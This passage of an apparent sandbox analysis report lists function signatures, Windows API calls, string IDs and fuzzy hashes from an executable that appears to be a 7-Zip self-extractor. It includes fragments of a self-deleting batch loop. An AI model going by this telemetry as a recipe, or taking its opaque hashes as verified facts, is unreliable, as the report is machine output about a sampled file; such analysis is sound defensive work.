                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Window$AddressLibraryLoadProc
                                              • String ID: SetWindowTheme$\EA$uxtheme
                                              • API String ID: 324724604-1613512829
                                              • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                              • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                              • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                              • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                              • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                              • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                              • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                              • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                              • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                              • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                              • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                              • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                              • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                              • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                              • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                              • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                              APIs
                                              • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                              • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404C37
                                              • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                              • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404C72
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404C7E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404C84
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404CB2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                              • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                              • API String ID: 3007203151-3467708659
                                              • Opcode ID: d701faffb96b70708956d7dcad1a35af3dd98bc2c1ad9aac87790182f52bc143
                                              • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                              • Opcode Fuzzy Hash: d701faffb96b70708956d7dcad1a35af3dd98bc2c1ad9aac87790182f52bc143
                                              • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                                • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT ref: 00402032
                                                • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT ref: 00402071
                                                • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT ref: 004020E7
                                                • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                              • _wtol.MSVCRT(00000000), ref: 004047DC
                                              • _wtol.MSVCRT(00000000), ref: 004047F8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                              • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                              • API String ID: 2725485552-3187639848
                                              • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                              • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                              • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                              • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                              APIs
                                              • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                              • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                • Part of subcall function 00401A85: CharUpperW.USER32(?,771AE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402E20
                                              • GetParent.USER32(?), ref: 00402E2E
                                              • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                              • GetMenu.USER32(?), ref: 00402E55
                                              • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                              • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                              • DestroyWindow.USER32(?), ref: 00402EA3
                                              • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                              • GetSysColor.USER32(0000000F), ref: 00402EBC
                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                              • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402EFA
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402F02
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                              • String ID: RichEdit20W$STATIC$riched20${\rtf
                                              • API String ID: 1731037045-2281146334
                                              • Opcode ID: 03bc8aed1f2fd14e0796ec378d4e1603c9b22b1f4049b08112cc7c601d8becca
                                              • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                              • Opcode Fuzzy Hash: 03bc8aed1f2fd14e0796ec378d4e1603c9b22b1f4049b08112cc7c601d8becca
                                              • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                              APIs
                                              • GetWindowDC.USER32(00000000), ref: 00401CD4
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                              • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                              • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                              • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                              • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                              • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                              • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                              • SelectObject.GDI32(00000000,?), ref: 00401D60
                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                              • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                              • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                              • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                              • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                              • DeleteDC.GDI32(00000000), ref: 00401DC2
                                              • DeleteDC.GDI32(00000000), ref: 00401DC5
                                              • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                              • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                              • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                              • String ID:
                                              • API String ID: 3462224810-0
                                              • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                              • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                              • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                              • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                              APIs
                                              • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                              • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                              • GetMenu.USER32(?), ref: 00401E44
                                                • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                              • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                              • memcpy.MSVCRT ref: 00401E83
                                              • CoInitialize.OLE32(00000000), ref: 00401E8C
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                              • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                              • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                              • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                              • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                              • String ID: IMAGES$STATIC
                                              • API String ID: 4202116410-1168396491
                                              • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                              • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                              • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                              • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                              APIs
                                                • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                              • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                              • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                              • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                              • SetWindowLongW.USER32(00000000), ref: 004081D8
                                              • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                              • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                              • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                              • SetFocus.USER32(00000000), ref: 0040821D
                                              • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                              • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                              • GetDlgItem.USER32(?,00000002), ref: 00408294
                                              • IsWindow.USER32(00000000), ref: 00408297
                                              • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                              • EnableWindow.USER32(00000000), ref: 004082AA
                                              • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                              • ShowWindow.USER32(00000000), ref: 004082C1
                                                • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT ref: 00407C53
                                                • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                              • String ID:
                                              • API String ID: 855516470-0
                                              • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                              • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                              • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                              • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004030F6
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004030FE
                                              • strncmp.MSVCRT(0040414C,{\rtf,00000005,00000000,00000000,hAA,00000000), ref: 004031F1
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403255
                                              • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403347
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@$lstrcmpstrncmp
                                              • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                              • API String ID: 2881732429-172299233
                                              • Opcode ID: 37b83b528cee5bff266f161597e1daa105c3eade906d836347b77139c21a9d55
                                              • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                              • Opcode Fuzzy Hash: 37b83b528cee5bff266f161597e1daa105c3eade906d836347b77139c21a9d55
                                              • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                              APIs
                                              • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                              • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
